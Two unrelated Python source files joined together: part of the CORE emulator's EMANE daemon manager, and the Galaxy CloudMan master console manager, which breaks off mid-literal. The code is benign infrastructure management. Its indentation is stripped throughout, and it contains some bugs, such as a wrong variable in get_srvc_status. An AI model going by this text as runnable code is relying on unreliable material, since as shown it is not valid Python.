emanexml.create_event_service_xml(group, port, dev, self.session.session_dir)
def startdaemons(self):
"""
Start one EMANE daemon per node having a radio.
Add a control network even if the user has not configured one.
"""
logging.info("starting emane daemons...")
loglevel = str(EmaneManager.DEFAULT_LOG_LEVEL)
cfgloglevel = self.session.options.get_config_int("emane_log_level")
realtime = self.session.options.get_config_bool("emane_realtime", default=True)
if cfgloglevel:
logging.info("setting user-defined EMANE log level: %d", cfgloglevel)
loglevel = str(cfgloglevel)
emanecmd = ["emane", "-d", "-l", loglevel]
if realtime:
emanecmd += "-r",
otagroup, _otaport = self.get_config("otamanagergroup").split(":")
otadev = self.get_config("otamanagerdevice")
otanetidx = self.session.get_control_net_index(otadev)
eventgroup, _eventport = self.get_config("eventservicegroup").split(":")
eventdev = self.get_config("eventservicedevice")
eventservicenetidx = self.session.get_control_net_index(eventdev)
run_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
run_emane_on_host = True
continue
path = self.session.session_dir
n = node.id
# control network not yet started here
self.session.add_remove_control_interface(node, 0, remove=False, conf_required=False)
if otanetidx > 0:
logging.info("adding ota device ctrl%d", otanetidx)
self.session.add_remove_control_interface(node, otanetidx, remove=False, conf_required=False)
if eventservicenetidx >= 0:
logging.info("adding event service device ctrl%d", eventservicenetidx)
self.session.add_remove_control_interface(node, eventservicenetidx, remove=False, conf_required=False)
# multicast route is needed for OTA data
args = [constants.IP_BIN, "route", "add", otagroup, "dev", otadev]
node.check_cmd(args)
# multicast route is also needed for event data if on control network
if eventservicenetidx >= 0 and eventgroup != otagroup:
args = [constants.IP_BIN, "route", "add", eventgroup, "dev", eventdev]
node.check_cmd(args)
# start emane
args = emanecmd + ["-f", os.path.join(path, "emane%d.log" % n), os.path.join(path, "platform%d.xml" % n)]
output = node.check_cmd(args)
logging.info("node(%s) emane daemon running: %s", node.name, args)
logging.info("node(%s) emane daemon output: %s", node.name, output)
if not run_emane_on_host:
return
path = self.session.session_dir
emanecmd += ["-f", os.path.join(path, "emane.log")]
args = emanecmd + [os.path.join(path, "platform.xml")]
utils.check_cmd(args, cwd=path)
logging.info("host emane daemon running: %s", args)
def stopdaemons(self):
"""
Kill the appropriate EMANE daemons.
"""
# TODO: we may want to improve this if we had the PIDs from the specific EMANE daemons that we've started
args = ["killall", "-q", "emane"]
stop_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
stop_emane_on_host = True
continue
if node.up:
node.cmd(args, wait=False)
# TODO: RJ45 node
if stop_emane_on_host:
try:
utils.check_cmd(args)
utils.check_cmd(["killall", "-q", "emanetransportd"])
except CoreCommandError:
logging.exception("error shutting down emane daemons")
def installnetifs(self):
"""
Install TUN/TAP virtual interfaces into their proper namespaces
now that the EMANE daemons are running.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.info("emane install netifs for node: %d", key)
emane_node.installnetifs()
def deinstallnetifs(self):
"""
Uninstall TUN/TAP virtual interfaces.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emane_node.deinstallnetifs()
def doeventmonitor(self):
"""
Returns boolean whether or not EMANE events will be monitored.
"""
# this support must be explicitly turned on; by default, CORE will
# generate the EMANE events when nodes are moved
return self.session.options.get_config_bool("emane_event_monitor")
def genlocationevents(self):
"""
Returns boolean whether or not EMANE events will be generated.
"""
# By default, CORE generates EMANE location events when nodes
# are moved; this can be explicitly disabled in core.conf
tmp = self.session.options.get_config_bool("emane_event_generate")
if tmp is None:
tmp = not self.doeventmonitor()
return tmp
def starteventmonitor(self):
"""
Start monitoring EMANE location events if configured to do so.
"""
logging.info("emane start event monitor")
if not self.doeventmonitor():
return
if self.service is None:
logging.error("Warning: EMANE events will not be generated "
"because the emaneeventservice\n binding was "
"unable to load "
"(install the python-emaneeventservice bindings)")
return
self.doeventloop = True
self.eventmonthread = threading.Thread(target=self.eventmonitorloop)
self.eventmonthread.daemon = True
self.eventmonthread.start()
def stopeventmonitor(self):
"""
Stop monitoring EMANE location events.
"""
self.doeventloop = False
if self.service is not None:
self.service.breakloop()
# reset the service, otherwise nextEvent won't work
self.initeventservice(shutdown=True)
if self.eventmonthread is not None:
# TODO: fix this
self.eventmonthread._Thread__stop()
self.eventmonthread.join()
self.eventmonthread = None
def eventmonitorloop(self):
"""
Thread target that monitors EMANE location events.
"""
if self.service is None:
return
logging.info("subscribing to EMANE location events. (%s)", threading.currentThread().getName())
while self.doeventloop is True:
_uuid, _seq, events = self.service.nextEvent()
# this occurs with 0.9.1 event service
if not self.doeventloop:
break
for event in events:
nem, eid, data = event
if eid == LocationEvent.IDENTIFIER:
self.handlelocationevent(nem, eid, data)
logging.info("unsubscribing from EMANE location events. (%s)", threading.currentThread().getName())
def handlelocationevent(self, rxnemid, eid, data):
"""
Handle an EMANE location event.
"""
events = LocationEvent()
events.restore(data)
for event in events:
txnemid, attrs = event
if "latitude" not in attrs or "longitude" not in attrs or "altitude" not in attrs:
logging.warning("dropped invalid location event")
continue
# yaw,pitch,roll,azimuth,elevation,velocity are unhandled
lat = attrs["latitude"]
lon = attrs["longitude"]
alt = attrs["altitude"]
logging.debug("emane location event: %s,%s,%s", lat, lon, alt)
self.handlelocationeventtoxyz(txnemid, lat, lon, alt)
def handlelocationeventtoxyz(self, nemid, lat, lon, alt):
"""
Convert the (NEM ID, lat, long, alt) from a received location event
into a node and x,y,z coordinate values, sending a Node Message.
Returns True if successfully parsed and a Node Message was sent.
"""
# convert nemid to node number
_emanenode, netif = self.nemlookup(nemid)
if netif is None:
logging.info("location event for unknown NEM %s", nemid)
return False
n = netif.node.id
# convert from lat/long/alt to x,y,z coordinates
x, y, z = self.session.location.getxyz(lat, lon, alt)
x = int(x)
y = int(y)
z = int(z)
logging.info("location event NEM %s (%s, %s, %s) -> (%s, %s, %s)", nemid, lat, lon, alt, x, y, z)
xbit_check = x.bit_length() > 16 or x < 0
ybit_check = y.bit_length() > 16 or y < 0
zbit_check = z.bit_length() > 16 or z < 0
if any([xbit_check, ybit_check, zbit_check]):
logging.error("Unable to build node location message, received lat/long/alt exceeds coordinate "
"space: NEM %s (%d, %d, %d)", nemid, x, y, z)
return False
# generate a node message for this location update
try:
node = self.session.get_node(n)
except KeyError:
logging.exception("location event NEM %s has no corresponding node %s" % (nemid, n))
return False
# don"t use node.setposition(x,y,z) which generates an event
node.position.set(x, y, z)
node_data = node.data(message_type=0, lat=str(lat), lon=str(lon), alt=str(alt))
self.session.broadcast_node(node_data)
return True
def emanerunning(self, node):
"""
Return True if an EMANE process associated with the given node is running, False otherwise.
"""
args = ["pkill", "-0", "-x", "emane"]
status = node.cmd(args)
return status == 0
class EmaneGlobalModel(EmaneModel):
"""
Global EMANE configuration options.
"""
_DEFAULT_DEV = "ctrl0"
name = "emane"
emulator_xml = "/usr/share/emane/manifest/nemmanager.xml"
emulator_defaults = {
"eventservicedevice": _DEFAULT_DEV,
"eventservicegroup": "224.1.2.8:45703",
"otamanagerdevice": _DEFAULT_DEV,
"otamanagergroup": "224.1.2.8:45702"
}
emulator_config = emanemanifest.parse(emulator_xml, emulator_defaults)
emulator_config.insert(
0,
Configuration(_id="platform_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting Platform ID (core)")
)
nem_config = [
Configuration(_id="nem_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting NEM ID (core)")
]
@classmethod
def configurations(cls):
return cls.emulator_config + cls.nem_config
@classmethod
def config_groups(cls):
emulator_len = len(cls.emulator_config)
config_len = len(cls.configurations())
return [
ConfigGroup("Platform Attributes", 1, emulator_len),
ConfigGroup("NEM Parameters", emulator_len + 1, config_len)
]
def __init__(self, session, _id=None):
super(EmaneGlobalModel, self).__init__(session, _id)
def build_xml_files(self, config, interface=None):
raise NotImplementedError
|
master.py
|
"""Galaxy CM master manager"""
import commands
import fileinput
import logging
import logging.config
import os
import subprocess
import threading
import time
import datetime as dt
import json
import shutil
from cm.services import ServiceRole
from cm.services import ServiceType
from cm.services import service_states
from cm.services.apps.galaxy import GalaxyService
from cm.services.apps.galaxyreports import GalaxyReportsService
from cm.services.apps.hadoop import HadoopService
from cm.services.apps.htcondor import HTCondorService
from cm.services.apps.migration import MigrationService
from cm.services.apps.postgres import PostgresService
from cm.services.apps.proftpd import ProFTPdService
from cm.services.apps.pss import PSSService
from cm.services.apps.sge import SGEService
from cm.services.autoscale import Autoscale
from cm.services.data.filesystem import Filesystem
from cm.util import (cluster_status, comm, instance_lifecycle, instance_states,
misc, spot_states, Time)
from cm.util.decorators import TestFlag
from cm.util.manager import BaseConsoleManager
import cm.util.paths as paths
from boto.exception import EC2ResponseError, S3ResponseError
log = logging.getLogger('cloudman')
# A time well in the past, used to seed the reboot and last-comm timestamps.
TIME_IN_PAST = dt.datetime(2012, 1, 1, 0, 0, 0)
s3_rlock = threading.RLock()
def synchronized(rlock):
"""
Synchronization decorator
http://stackoverflow.com/a/490090
"""
def wrap(f):
def newFunction(*args, **kw):
with rlock:
return f(*args, **kw)
return newFunction
return wrap
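# Illustrative usage (the method name below is hypothetical): decorating a
# method with @synchronized(s3_rlock) serializes callers on the shared S3
# lock, so only one thread at a time executes the decorated body.
#
#     @synchronized(s3_rlock)
#     def _save_cluster_config(self):
#         ...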
class ConsoleManager(BaseConsoleManager):
node_type = "master"
def __init__(self, app):
self.startup_time = Time.now()
log.debug("Initializing console manager - cluster start time: %s" %
self.startup_time)
self.app = app
self.console_monitor = ConsoleMonitor(self.app)
self.root_pub_key = None
self.cluster_status = cluster_status.STARTING
self.num_workers_requested = 0 # Number of worker nodes requested by user
# The actual worker nodes (note: this is a list of Instance objects)
# (Because get_worker_instances currently depends on tags, which are only
# supported by EC2-compatible clouds, get the list of instances only for the
# EC2 and OpenStack cases. This initialization applies only when restarting a cluster.)
self.worker_instances = self.get_worker_instances() if (self.app.cloud_type == 'ec2' or self.app.cloud_type == 'openstack') else []
self.disk_total = "0"
self.disk_used = "0"
self.disk_pct = "0%"
self.manager_started = False
self.cluster_manipulation_in_progress = False
# If this is set to False, the master instance will not be an execution
# host in SGE and thus not be running any jobs
self.master_exec_host = True
self.initial_cluster_type = None
self.cluster_storage_type = None
self.services = []
# Static data - get snapshot IDs from the default bucket and add respective file systems
self.snaps = self._load_snapshot_data()
self.default_galaxy_data_size = 0
def add_master_service(self, new_service):
if not self.get_services(svc_name=new_service.name):
log.debug("Adding service %s into the master service registry" % new_service.name)
self.services.append(new_service)
self._update_dependencies(new_service, "ADD")
else:
log.debug("Would add master service %s but one already exists" % new_service.name)
def remove_master_service(self, service_to_remove):
self.services.remove(service_to_remove)
self._update_dependencies(service_to_remove, "REMOVE")
def _update_dependencies(self, new_service, action):
"""
Updates service dependencies when a service is added or removed.
Iterates through all services; if the action is "ADD" and the newly
added service fulfills a requirement of an existing service, the new
service is set as the service assigned to fulfill that requirement.
If the action is "REMOVE", the assigned service is cleared for every
requirement that depends on the removed service.
"""
log.debug("Updating dependencies for service {0}".format(new_service.name))
for svc in self.services:
if action == "ADD":
for req in new_service.dependencies:
if req.is_satisfied_by(svc):
# log.debug("Service {0} has a dependency on role {1}. Dependency updated during service action: {2}".format(
# req.owning_service.name, new_service.name, action))
req.assigned_service = svc
elif action == "REMOVE":
for req in svc.dependencies:
if req.is_satisfied_by(new_service):
# log.debug("Service {0} has a dependency on role {1}. Dependency updated during service action: {2}".format(
# req.owning_service.name, new_service.name, action))
req.assigned_service = None
def _stop_app_level_services(self):
""" Convenience function that suspends SGE jobs and removes Galaxy &
Postgres services, thus allowing system level operations to be performed."""
# Suspend all SGE jobs
log.debug("Suspending SGE queue all.q")
misc.run('export SGE_ROOT=%s; . $SGE_ROOT/default/common/settings.sh; %s/bin/lx24-amd64/qmod -sq all.q'
% (self.app.path_resolver.sge_root, self.app.path_resolver.sge_root), "Error suspending SGE jobs", "Successfully suspended all SGE jobs.")
# Stop application-level services managed via CloudMan
# If additional services are to be added as things CloudMan can handle,
# they should be added to the for-loop list (in the order in which they
# are to be removed)
if self.initial_cluster_type == 'Galaxy':
for svc_role in [ServiceRole.GALAXY, ServiceRole.GALAXY_POSTGRES,
ServiceRole.PROFTPD]:
try:
svc = self.get_services(svc_role=svc_role)
if svc:
svc[0].remove()
except IndexError, e:
log.error("Tried removing app level service '%s' but failed: %s"
% (svc_role, e))
def _start_app_level_services(self):
# Resume application-level services managed via CloudMan
# If additional services are to be added as things CloudMan can handle,
# they should be added to the for-loop list (in the order in which they
# are to be added)
for svc_role in [ServiceRole.GALAXY_POSTGRES, ServiceRole.PROFTPD,
ServiceRole.GALAXY]:
try:
svc = self.get_services(svc_role=svc_role)
if svc:
svc[0].add()
except IndexError, e:
log.error("Tried adding app level service '%s' but failed: %s"
% (ServiceRole.to_string([svc_role]), e))
log.debug("Unsuspending SGE queue all.q")
misc.run('export SGE_ROOT=%s; . $SGE_ROOT/default/common/settings.sh; %s/bin/lx24-amd64/qmod -usq all.q'
% (self.app.path_resolver.sge_root, self.app.path_resolver.sge_root),
"Error unsuspending SGE jobs",
"Successfully unsuspended all SGE jobs")
def recover_monitor(self, force='False'):
if self.console_monitor:
if force == 'True':
self.console_monitor.shutdown()
else:
return False
self.console_monitor = ConsoleMonitor(self.app)
self.console_monitor.start()
return True
def snapshot_status(self):
"""
Get the status of a file system volume currently being snapshotted. This
method looks through all the file systems and all volumes associated with
a file system and returns the status and progress for the first volume
going through the snapshot process.
In addition, if a file system is marked as needing to 'grow' or sharing of
the cluster is currently pending but no volumes are currently being
snapshotted, the method returns 'configuring' as the status.
:rtype: array of strings of length 2
:return: A pair of values as strings indicating (1) the status (e.g.,
pending, complete) of the snapshot and (2) the progress.
"""
fsarr = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for fs in fsarr:
for vol in fs.volumes:
if vol.snapshot_status is not None:
return (vol.snapshot_status, vol.snapshot_progress)
            # No volume is being snapshotted; check if waiting to 'grow' one
if fs.grow:
return ("configuring", None)
if self.cluster_manipulation_in_progress:
return ("configuring", None)
return (None, None)
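    # Illustrative usage (a sketch, not part of the original code): the
    # (status, progress) pair returned above is presumably polled while a
    # snapshot is in flight, e.g.:
    #
    #   status, progress = manager.snapshot_status()
    #   if status == 'pending':
    #       log.debug("Snapshot %s complete" % progress)
    #   elif status == 'configuring':
    #       log.debug("Cluster manipulation in progress; no snapshot running yet")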
@TestFlag([])
@synchronized(s3_rlock)
def _load_snapshot_data(self):
"""
Retrieve and return information about the default filesystems.
This is done by retrieving ``snaps.yaml`` from the default bucket and
parsing it to match the current cloud, region, and deployment.
Returns a list of dictionaries.
"""
s3_conn = self.app.cloud_interface.get_s3_connection()
snaps_file = 'cm_snaps.yaml'
snaps = []
cloud_name = self.app.ud.get('cloud_name', 'amazon').lower()
# Get a list of default file system data sources
if s3_conn and misc.get_file_from_bucket(s3_conn, self.app.ud['bucket_default'],
'snaps.yaml', snaps_file):
pass
elif misc.get_file_from_public_bucket(self.app.ud, self.app.ud['bucket_default'], 'snaps.yaml', snaps_file):
log.warn("Couldn't get snaps.yaml from bucket: %s. However, managed to retrieve from public s3 url instead." % self.app.ud['bucket_default'])
else:
log.error("Couldn't get snaps.yaml at all! Will not be able to create Galaxy Data and Index volumes.")
return []
snaps_file = misc.load_yaml_file(snaps_file)
if 'static_filesystems' in snaps_file:
# Old snaps.yaml format
snaps = snaps_file['static_filesystems']
# Convert the old format into the new one and return a
# uniform snaps dict
for f in snaps:
f['name'] = f['filesystem'] # Rename the key
f.pop('filesystem', None) # Delete the old key
else:
# Unify all Amazon regions and/or name variations to a single one
if 'amazon' in cloud_name:
cloud_name = 'amazon'
for cloud in snaps_file['clouds']:
if cloud_name == cloud['name'].lower():
current_cloud = cloud
for r in current_cloud['regions']:
if r['name'].lower() == self.app.cloud_interface.get_region_name().lower():
for d in r['deployments']:
# TODO: Make the deployment name a UD option
if d['name'] == 'GalaxyCloud':
snaps = d['filesystems']
log.debug("Loaded default snapshot data for cloud {1}: {0}".format(snaps,
cloud_name))
return snaps
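    # Rough sketch of the two snaps.yaml layouts the parser above accepts
    # (field names inferred from the code; values are illustrative only):
    #
    #   # Old format
    #   static_filesystems:
    #     - filesystem: galaxyData
    #       size: 10
    #
    #   # New format
    #   clouds:
    #     - name: amazon
    #       regions:
    #         - name: us-east-1
    #           deployments:
    #             - name: GalaxyCloud
    #               filesystems:
    #                 - name: galaxyData
    #                   roles: galaxyData
    #                   snap_id: snap-xxxxxxxx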
@TestFlag(10)
def get_default_data_size(self):
if not self.default_galaxy_data_size:
for snap in self.snaps:
roles = ServiceRole.from_string_array(snap['roles'])
if ServiceRole.GALAXY_DATA in roles:
if 'size' in snap:
self.default_galaxy_data_size = snap['size']
elif 'snap_id' in snap:
self.snapshot = (self.app.cloud_interface.get_ec2_connection()
.get_all_snapshots([snap['snap_id']])[0])
self.default_galaxy_data_size = self.snapshot.volume_size
log.debug("Got default galaxy FS size as {0}GB".format(
self.default_galaxy_data_size))
return str(self.default_galaxy_data_size)
@TestFlag(False)
def start(self):
"""
This method is automatically called as CloudMan starts; it tries to add
and start available cluster services (as provided in the cluster's
configuration and persistent data).
"""
log.debug("User Data at manager start, with secret_key and password filtered out: %s" %
dict((k, self.app.ud[k]) for k in self.app.ud.keys() if k not in ['password', 'secret_key']))
self._handle_prestart_commands()
# Generating public key before any worker has been initialized
        # This is required for configuring Hadoop: the main Hadoop worker still
        # needs to be able to ssh into itself. This should happen before the SGE
        # service is added.
self.get_root_public_key()
# Always add migration service
self.add_master_service(MigrationService(self.app))
# Always add SGE service
self.add_master_service(SGEService(self.app))
# Always share instance transient storage over NFS
tfs = Filesystem(self.app, 'transient_nfs', svc_roles=[ServiceRole.TRANSIENT_NFS])
tfs.add_transient_storage()
self.add_master_service(tfs)
# Always add PSS service - note that this service runs only after the cluster
# type has been selected and all of the services are in RUNNING state
self.add_master_service(PSSService(self.app))
if self.app.config.condor_enabled:
self.add_master_service(HTCondorService(self.app, "master"))
# KWS: Optionally add Hadoop service based on config setting
if self.app.config.hadoop_enabled:
self.add_master_service(HadoopService(self.app))
# Check if starting a derived cluster and initialize from share,
# which calls add_preconfigured_services
# Note that share_string overrides everything.
if "share_string" in self.app.ud:
# BUG TODO this currently happens on reboot, and shouldn't.
self.init_shared_cluster(self.app.ud['share_string'].strip())
# else look if this is a restart of a previously existing cluster
# and add appropriate services
elif not self.add_preconfigured_services():
return False
self.manager_started = True
# Check if a previously existing cluster is being recreated or if it is a new one
if not self.initial_cluster_type: # this can get set by _handle_old_cluster_conf_format
self.initial_cluster_type = self.app.ud.get('cluster_type', None)
if self.initial_cluster_type is not None:
cc_detail = "Configuring a previously existing cluster of type {0}"\
.format(self.initial_cluster_type)
else:
cc_detail = "This is a new cluster; waiting to configure the type."
self.cluster_status = cluster_status.WAITING
else:
cc_detail = "Configuring an old existing cluster of type {0}"\
.format(self.initial_cluster_type)
log.info("Completed the initial cluster startup process. {0}".format(
cc_detail))
return True
    def _handle_prestart_commands(self):
"""
Inspect the user data key ``master_prestart_commands`` and simply
execute any commands provided there.
For example::
master_prestart_commands:
- "mkdir -p /mnt/galaxyData/pgsql/"
- "mkdir -p /mnt/galaxyData/tmp"
- "chown -R galaxy:galaxy /mnt/galaxyData"
"""
for command in self.app.ud.get("master_prestart_commands", []):
misc.run(command)
@TestFlag(False)
def add_preconfigured_services(self):
"""
Inspect the cluster configuration and persistent data to add any
previously defined cluster services.
"""
log.debug("Checking for and adding any previously defined cluster services")
return self.add_preconfigured_filesystems() and self.add_preconfigured_applications()
def add_preconfigured_filesystems(self):
try:
# Process the current cluster config
log.debug("Processing filesystems in an existing cluster config")
attached_volumes = self.get_attached_volumes()
if 'filesystems' in self.app.ud:
for fs in self.app.ud.get('filesystems') or []:
err = False
filesystem = Filesystem(self.app, fs['name'], svc_roles=ServiceRole.from_string_array(
fs['roles']), mount_point=fs.get('mount_point', None))
                    # Based on the kind, add the appropriate file system. We can
                    # handle 'volume', 'snapshot', 'nfs', 'gluster', 'transient',
                    # or 'bucket' kinds
if fs['kind'] == 'volume':
if 'ids' not in fs and 'size' in fs:
# We're creating a new volume
filesystem.add_volume(size=fs['size'])
else:
# A volume already exists so use it
for vol_id in fs['ids']:
filesystem.add_volume(vol_id=vol_id)
elif fs['kind'] == 'snapshot':
for snap in fs['ids']:
# Check if an already attached volume maps to this snapshot
att_vol = self.get_vol_if_fs(attached_volumes, fs['name'])
if att_vol:
filesystem.add_volume(vol_id=att_vol.id, size=att_vol.size,
from_snapshot_id=att_vol.snapshot_id)
else:
filesystem.add_volume(from_snapshot_id=snap)
elif fs['kind'] == 'nfs':
filesystem.add_nfs(fs['nfs_server'], None, None, mount_options=fs.get('mount_options', None))
elif fs['kind'] == 'gluster':
filesystem.add_glusterfs(fs['gluster_server'], mount_options=fs.get('mount_options', None))
elif fs['kind'] == 'transient':
filesystem.add_transient_storage(persistent=True)
elif fs['kind'] == 'bucket':
a_key = fs.get('access_key', None)
s_key = fs.get('secret_key', None)
# Can have only a single bucket per file system so
# access it directly
bucket_name = fs.get('ids', [None])[0]
if bucket_name:
filesystem.add_bucket(bucket_name, a_key, s_key)
else:
log.warning("No bucket name for file system {0}!".format(
fs['name']))
                    # TODO: include support for additional file system kinds
else:
# TODO: try to do some introspection on the device ID
# to guess the kind before err
err = True
log.warning("Device kind '{0}' for file system {1} not recognized; "
"not adding the file system.".format(fs['kind'], fs['name']))
if not err:
log.debug("Adding a previously existing filesystem '{0}' of "
"kind '{1}'".format(fs['name'], fs['kind']))
self.add_master_service(filesystem)
return True
except Exception, e:
log.error(
"Error processing filesystems in existing cluster configuration: %s" % e)
self.manager_started = False
return False
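    # For reference, a hedged sketch of the user-data ``filesystems`` entries the
    # loop above understands (keys taken from the code; values are illustrative):
    #
    #   filesystems:
    #     - name: galaxy
    #       roles: [galaxyTools, galaxyData]
    #       kind: volume            # or: snapshot, nfs, gluster, transient, bucket
    #       ids: [vol-xxxxxxxx]     # omit and provide 'size' to create a new volume
    #       mount_point: /mnt/galaxy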
def add_preconfigured_applications(self):
"""
Dynamically add any previously available applications to the service
registry, which will in turn start those apps. The service list is
extracted from the user data.
Note that this method is automatically called when an existing cluster
is being recreated.
In order for the dynamic service loading to work, there are some requirements
on the structure of user data and services themselves. Namely, user data
must contain a name for the service. The service implementation must be in
a module inside ``cm.services.apps`` and it must match the service name
(e.g., ``cm.services.apps.proftpd``). The provided service/file name must
match the service class without the "Service" string. For example, if service
name is ``ProFTPd``, file name must be proftpd.py and the service class
        name must be ``ProFTPdService``, properly capitalized.
"""
try:
ok = True # Flag keeping up with progress
# Process the current cluster config
log.debug("Processing previously-available application services in "
"an existing cluster config")
# TODO: Should we inspect a provided path for service availability vs. UD only?
if "services" in self.app.ud:
log.debug("Previously-available applications: {0}"
.format(self.app.ud['services']))
for srvc in self.app.ud['services']:
service_class = None
svc_name = srvc.get('name', None)
if svc_name:
# Import service module and get a reference to the service object
try:
module_name = svc_name.lower()
svc_name += "Service" # Service class name must match this str!
module = __import__('cm.services.apps.' + module_name,
fromlist=[svc_name])
service_class = getattr(module, svc_name)
except Exception, e:
log.warning("Trouble importing service class {0}: {1}"
.format(svc_name, e))
if service_class:
# Add the service into the service registry
self.add_master_service(service_class(self.app))
else:
ok = False
log.warning("Could not find service class matching "
"userData service entry: %s" % svc_name)
return ok
except Exception, e:
log.error("Error processing applications in existing cluster configuration: %s" % e)
self.manager_started = False
return False
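    # A minimal sketch of the naming convention the loader above relies on
    # (the ProFTPd example comes from the docstring; the rest mirrors the code):
    # a user-data entry such as
    #
    #   services:
    #     - name: ProFTPd
    #
    # is resolved to module ``cm.services.apps.proftpd`` and class
    # ``ProFTPdService``, i.e. roughly:
    #
    #   module = __import__('cm.services.apps.' + 'ProFTPd'.lower(),
    #                       fromlist=['ProFTPdService'])
    #   service_class = getattr(module, 'ProFTPdService')
    #   manager.add_master_service(service_class(manager.app))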
def get_vol_if_fs(self, attached_volumes, filesystem_name):
"""
Iterate through the list of (attached) volumes and check if any
        one of them matches the current cluster name and filesystem (as stored
        in the volume's tags). Return a matching volume (as a ``boto`` object) or
``None``.
*Note* that this method returns the first matching volume and will thus
not work for filesystems composed of multiple volumes.
"""
for vol in attached_volumes:
log.debug("Checking if vol '{0}' is file system '{1}'".format(
vol.id, filesystem_name))
if self.app.cloud_interface.get_tag(vol, 'clusterName') == self.app.ud['cluster_name'] \
and self.app.cloud_interface.get_tag(vol, 'filesystem') == filesystem_name:
log.debug("Identified attached volume '%s' as filesystem '%s'" % (
vol.id, filesystem_name))
return vol
return None
def start_autoscaling(self, as_min, as_max, instance_type):
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
if not as_svc:
self.add_master_service(
Autoscale(self.app, as_min, as_max, instance_type))
else:
log.debug("Autoscaling is already on.")
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
log.debug(as_svc[0])
def stop_autoscaling(self):
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
if as_svc:
self.remove_master_service(as_svc[0])
else:
log.debug("Not stopping autoscaling because it is not on.")
def adjust_autoscaling(self, as_min, as_max):
as_svc = self.get_services(svc_role=ServiceRole.AUTOSCALE)
if as_svc:
as_svc[0].as_min = int(as_min)
as_svc[0].as_max = int(as_max)
log.debug("Adjusted autoscaling limits; new min: %s, new max: %s" % (as_svc[
0].as_min, as_svc[0].as_max))
else:
log.debug(
"Cannot adjust autoscaling because autoscaling is not on.")
# DBTODO For now this is a quick fix to get a status.
# Define what 'yellow' would be, and don't just count on "Filesystem"
# being the only data service.
def get_data_status(self):
fses = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
if fses != []:
for fs in fses:
if fs.state == service_states.ERROR:
return "red"
elif fs.state != service_states.RUNNING:
return "yellow"
return "green"
else:
return "nodata"
def get_app_status(self):
count = 0
for svc in self.get_services(svc_type=ServiceType.APPLICATION):
count += 1
if svc.state == service_states.ERROR:
return "red"
elif not (svc.state == service_states.RUNNING or svc.state == service_states.COMPLETED):
return "yellow"
if count != 0:
return "green"
else:
return "nodata"
def get_services(self, svc_type=None, svc_role=None, svc_name=None):
"""
        Return all services that best match the given service type, role, and
        name. If a service name is specified, it is matched first and the single
        matching service is returned. Next, if a role is specified, all services
        containing that role are returned. Lastly, if ``svc_role`` is ``None``
        but a ``svc_type`` is specified, all services matching that type are
        returned.
"""
svcs = []
for s in self.services:
if s.name is None: # Sanity check
log.error("A name has not been assigned to the service. A value must be assigned to the svc.name property.")
elif s.name == svc_name:
return [s] # Only one match possible - so return it immediately
elif svc_role in s.svc_roles:
svcs.append(s)
elif s.svc_type == svc_type and svc_role is None:
svcs.append(s)
return svcs
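    # Illustrative calls (a sketch, not part of the original code), showing the
    # matching precedence described in the docstring above; name values are
    # illustrative:
    #
    #   manager.get_services(svc_name='Galaxy')                     # exact name -> at most one service
    #   manager.get_services(svc_role=ServiceRole.GALAXY_POSTGRES)  # all services filling that role
    #   manager.get_services(svc_type=ServiceType.FILE_SYSTEM)      # all file system services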
def all_fs_status_text(self):
return []
# FIXME: unreachable code
tr = []
for key, vol in self.volumes.iteritems():
if vol[3] is None:
tr.append("%s+nodata" % key)
else:
if vol[3] is True:
tr.append("%s+green" % key)
else:
tr.append("%s+red" % key)
return tr
def all_fs_status_array(self):
return []
# FIXME: unreachable code
tr = []
for key, vol in self.volumes.iteritems():
if vol[3] is None:
tr.append([key, "nodata"])
else:
if vol[3] is True:
tr.append([key, "green"])
else:
tr.append([key, "red"])
return tr
def fs_status_text(self):
"""fs_status"""
good_count = 0
bad_count = 0
fsarr = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
if len(fsarr) == 0:
return "nodata"
# DBTODO Fix this conflated volume/filesystem garbage.
for fs in fsarr:
if fs.state == service_states.RUNNING:
good_count += 1
else:
bad_count += 1
if good_count == len(fsarr):
return "green"
elif bad_count > 0:
return "red"
else:
return "yellow"
def pg_status_text(self):
"""pg_status"""
svcarr = self.get_services(svc_role=ServiceRole.GALAXY_POSTGRES)
if len(svcarr) > 0:
if svcarr[0].state == service_states.RUNNING:
return "green"
else:
return "red"
else:
return "nodata"
def sge_status_text(self):
"""sge_status"""
svcarr = self.get_services(svc_role=ServiceRole.SGE)
if len(svcarr) > 0:
if svcarr[0].state == service_states.RUNNING:
return "green"
else:
return "red"
else:
return "nodata"
def galaxy_status_text(self):
"""galaxy_status"""
svcarr = self.get_services(svc_role=ServiceRole.GALAXY)
if len(svcarr) > 0:
if svcarr[0].state == service_states.RUNNING:
return "green"
else:
return "red"
else:
return "nodata"
def get_srvc_status(self, srvc):
"""
Get the status a service ``srvc``. If the service is not a recognized as
a CloudMan-service, return ``Service not recognized``. If the service is
not currently running (i.e., not currently recognized by CloudMan as a
service it should be managing), return ``Service not found``.
"""
svcarr = self.get_services(svc_name=srvc)
svcarr = [s for s in svcarr if (s.svc_type == ServiceType.FILE_SYSTEM or ServiceRole.fulfills_roles(
s.svc_roles, [ServiceRole.GALAXY, ServiceRole.SGE, ServiceRole.GALAXY_POSTGRES]))]
if len(svcarr) > 0:
return srvc[0].state
else:
return "'%s' is not running" % srvc
return "Service '%s' not recognized." % srvc
@TestFlag([{"size_used": "184M", "status": "Running", "kind": "Transient",
"mount_point": "/mnt/transient_nfs", "name": "transient_nfs", "err_msg": None,
"device": "/dev/vdb", "size_pct": "1%", "DoT": "Yes", "size": "60G",
"persistent": "No"},
{"size_used": "33M", "status": "Running", "kind": "Volume",
"mount_point": "/mnt/galaxyData", "name": "galaxyData", "snapshot_status": None,
"err_msg": None, "snapshot_progress": None, "from_snap": "snap-galaxyFS",
"volume_id": "vol-0000000d", "device": "/dev/vdc", "size_pct": "4%",
"DoT": "No", "size": "1014M", "persistent": "Yes"},
